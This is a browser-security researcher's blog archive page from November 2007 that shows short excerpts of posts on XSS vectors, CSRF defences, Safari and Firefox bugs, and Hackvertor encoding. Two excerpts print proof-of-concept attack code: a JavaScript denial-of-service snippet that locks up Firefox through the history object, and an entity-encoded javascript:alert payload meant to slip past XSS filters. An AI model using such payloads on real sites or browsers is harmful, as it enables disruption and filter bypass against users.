Archives for the Month of November, 2007

Pointing the finger

I’ve just seen on the news today about German supermarkets using biometric data like fingerprints to purchase goods. The claims of increased convenience and the ability to earn points by just using your finger. All sounds good to the average consumer but what would happen if this method was used instead of debit/credit cards? In […]


I thought I’d continue the theme of experimenting with XSS and trying different things, I haven’t seen this written about anywhere so here goes. The idea is using CSS as a XSS payload, this can be useful when filters allow some things but make it difficult to construct an attack. I’ve decided to call it […]

Unusual XSS vectors

I’ve been working on my Hackvertor script to include XSS fuzzing which isn’t ready yet but I thought you might be interested in a few interesting results I’ve found 🙂 First off I’m sure you know you can use XSS in a img object yeah? Well did you know there’s also a image object as […]

CSK update

Sirdarckcat has been doing some work on my CSK kit and has improved it with new events and data handling improvements. This is great news because I haven’t had chance to work on it for a while with all the projects I’m involved in there’s just not enough time in the day. It’s still early […]

CSRF browser protection

I like the topic of CSRF because it’s such a difficult problem to solve, I was thinking about ways a browser can prevent CSRF and I’ve come up with the following solutions:- 1. After a domain name any image/object/frame etc request is truncated by a user definable setting. Limiting the amount of data an attacker […]

Safari security

Well what do you do when you report a bug to Apple and the deny it is even a problem? Turn it into a remote one. What do you do when they don’t provide you with any credit whatsoever? Give up? Stop testing Safari? Or drink lots of coffee and red bull, stay up all […]

Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:- window.onload = function() { history.__defineGetter__(“x”, function() { for(i in this) { try { alert(this[i]); } catch(e) { } } }); history.x; } Tested on Firefox mac, a window pops up with two blank buttons and you are unable to do anything without using […]

Spoofing Firefox protected objects

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong 🙂 This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know 😉 ). There […]

WebFu – Using the Hackvertor hanzo sword

I see my pupil that you are now ready to learn the ways of the samourai sword. The Shaolin Warrior’s IDS tiger style is strong but it is no match for the Hackvertor hanzo sword. Observe:- javascript :alert(/XSS PUNCH!/) Which produces a devastating blow:- &#x6A&#97vascrip&#x74&#58ale&#x72&#x74&#x28&#x2F&#x58 &#x53&#x53&#x20&#x50&#x55&#x4E&#x43&#x48&#x21&#x2F&#x29 I hope you have enjoyed this lesson young one […]

WebFu Dojo – XSS self defence

Welcome my young apprentice so you want to learn how to defend yourself from the onslaught of XSS ninjas do you? Well in my first Dojo lesson I shall show you techniques of the shaolin crane style to defend yourself from the XSS punch. XSS roundhouse Use the roundhouse wisely my young master and always […]